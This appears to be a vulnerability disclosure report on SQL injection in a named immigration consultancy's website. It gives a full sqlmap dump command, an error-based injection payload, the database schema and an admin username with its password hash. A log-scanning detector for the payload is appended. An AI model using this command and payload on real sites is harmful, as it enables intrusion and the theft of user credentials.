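2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public
SQL injection vulnerability on the main site of 御国天下移民顾问有限公司 (admin password disclosure)
URL: http://**.**.**.**/about.php?aid=9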
$ python sqlmap.py -u "http://**.**.**.**/about.php?aid=9" -p aid --technique=BE --random-agent --batch -D worldvisa -T php_members -C username,password,qq,telephone,email,alipay,mobile --dump
---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'worldvisa_f@localhost'
current user is DBA: False
database management system users [1]:
[*] 'worldvisa_f'@'localhost'

Database: worldvisa
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| php_product                           | 292     |
| php_product_dir                       | 102     |
| php_service                           | 33      |
| php_menu                              | 15      |
| php_link                              | 12      |
| php_down_dir                          | 9       |
| php_feedback                          | 9       |
| php_comment_list                      | 7       |
| php_mpb                               | 7       |
| php_article_dir                       | 6       |
| php_article_include                   | 6       |
| php_photo_dir                         | 6       |
| php_about                             | 5       |
| php_groups                            | 5       |
| php_about_include                     | 3       |
| php_case_include                      | 3       |
| php_down                              | 3       |
| php_news                              | 3       |
| php_news_dir                          | 3       |
| php_news_include                      | 3       |
| php_plugins                           | 3       |
| php_product_include                   | 3       |
| php_article                           | 2       |
| php_article_dir_include               | 2       |
| php_blog_logs                         | 2       |
| php_blog_logs_dir                     | 2       |
| php_blog_photo_dir                    | 2       |
| php_down_dir_include                  | 2       |
| php_down_include                      | 2       |
| php_link_include                      | 2       |
| php_mpb_dir                           | 2       |
| php_person                            | 2       |
| php_photo                             | 2       |
| php_product_orders                    | 2       |
| php_stat                              | 2       |
| php_about_setup                       | 1       |
| php_ad                                | 1       |
| php_blog_logs_dir_include             | 1       |
| php_blog_logs_include                 | 1       |
| php_blog_setup                        | 1       |
| php_case                              | 1       |
| php_case_dir                          | 1       |
| php_case_dir_include                  | 1       |
| php_comment                           | 1       |
| php_contact                           | 1       |
| php_contact_include                   | 1       |
| php_guest                             | 1       |
| php_members                           | 1       |
| php_mpb_dir_include                   | 1       |
| php_mpb_include                       | 1       |
| php_news_dir_include                  | 1       |
| php_person_include                    | 1       |
| php_photo_dir_include                 | 1       |
| php_photo_include                     | 1       |
| php_product_dir_include               | 1       |
| php_resource                          | 1       |
| php_resource_dir                      | 1       |
| php_resource_dir_include              | 1       |
| php_resource_include                  | 1       |
| php_service_include                   | 1       |
| php_setup                             | 1       |
| php_smtpmail                          | 1       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1671    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| STATISTICS                            | 229     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 115     |
| TABLES                                | 115     |
| KEY_COLUMN_USAGE                      | 75      |
| TABLE_CONSTRAINTS                     | 75      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

Database: worldvisa
Table: php_product
[292 entries]
---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[38 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| address      | varchar(150)          |
| adminid      | tinyint(1)            |
| alipay       | varchar(80)           |
| available    | tinyint(2)            |
| avatar       | varchar(150)          |
| bday         | varchar(10)           |
| bmonth       | varchar(10)           |
| byear        | varchar(10)           |
| city         | varchar(50)           |
| content      | text                  |
| credits      | int(10)               |
| edulevel     | varchar(30)           |
| email        | varchar(50)           |
| gender       | tinyint(1)            |
| groupid      | smallint(6) unsigned  |
| homepage     | varchar(100)          |
| idcard       | varchar(80)           |
| idtype       | varchar(30)           |
| income       | varchar(30)           |
| industry     | varchar(30)           |
| invisible    | tinyint(1)            |
| lastactivity | int(10) unsigned      |
| lastpost     | int(10) unsigned      |
| mobile       | varchar(50)           |
| msn          | varchar(80)           |
| occupation   | varchar(30)           |
| oltime       | smallint(6) unsigned  |
| pageviews    | mediumint(8) unsigned |
| password     | varchar(32)           |
| postid       | varchar(20)           |
| posts        | mediumint(8) unsigned |
| qq           | varchar(15)           |
| regdate      | int(10) unsigned      |
| regip        | varchar(15)           |
| telephone    | varchar(50)           |
| truename     | varchar(100)          |
| uid          | mediumint(8) unsigned |
| username     | varchar(15)           |
+--------------+-----------------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[1 entry]
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| username | password                         | qq      | telephone | email   | alipay  | mobile  |
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| 020jt    | d6a74d5ead4c725ed869d90d5660991e | <blank> | <blank>   | <blank> | <blank> | <blank> |
+----------+----------------------------------+---------+-----------+---------+---------+---------+
Filter the input.
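An added example, not part of the original report: a scan of web server access logs that flags requests shaped like the error-based payload in the sqlmap output above. The log lines are constructed, the rule names are illustrative, and treating aid as an integer-only parameter is an assumption based on aid=9.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Payload copied from the sqlmap output on this page.
PAGE_PAYLOAD = (
    "9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,"
    "(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM "
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB"
)
LOG_FMT = '{ip} - - [01/Dec/2015:10:00:00 +0800] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'
# Constructed access-log lines; IPs are documentation addresses. User agents vary
# because the command above uses --random-agent, so the UA is not a usable signal.
SAMPLE_LOG = [
    LOG_FMT.format(ip="192.0.2.10", path="/about.php?aid=9", ua="Mozilla/5.0"),
    LOG_FMT.format(ip="192.0.2.77", ua="Opera/9.80",
                   path="/about.php?aid=" + quote(PAGE_PAYLOAD, safe="")),
    LOG_FMT.format(ip="192.0.2.10", path="/search.php?q=how+to+select+a+visa", ua="Mozilla/5.0"),
    LOG_FMT.format(ip="203.0.113.5", path="/about.php?aid=9%27", ua="Safari/537.36"),
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3} ')
INT_PARAMS = {"aid"}  # assumption: aid is a numeric record id, as in aid=9
SIGNATURES = {  # shapes visible in the error-based payload above
    "rand-group-by": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "information_schema": re.compile(r"information_schema\."),
    "subselect": re.compile(r"\(\s*select\b"),
    "quote-tautology": re.compile(r"'(\w+)'\s*=\s*'\1\s*$"),
}

def scan(lines):
    """Return (client_ip, parameter, sorted rule names) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target = m.groups()
        # parse_qsl percent-decodes each parameter value once
        for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = raw.lower()
            rules = [rule for rule, rx in SIGNATURES.items() if rx.search(value)]
            if name in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
                rules.append("non-integer")
            if rules:
                hits.append((ip, name, sorted(rules)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The integer check on aid is the same test the application can apply before the value reaches the query; the search request containing the word "select" is not flagged because the rules match SQL structure rather than keywords alone.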
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-12-02 10:58
Referred to related parties.
None yet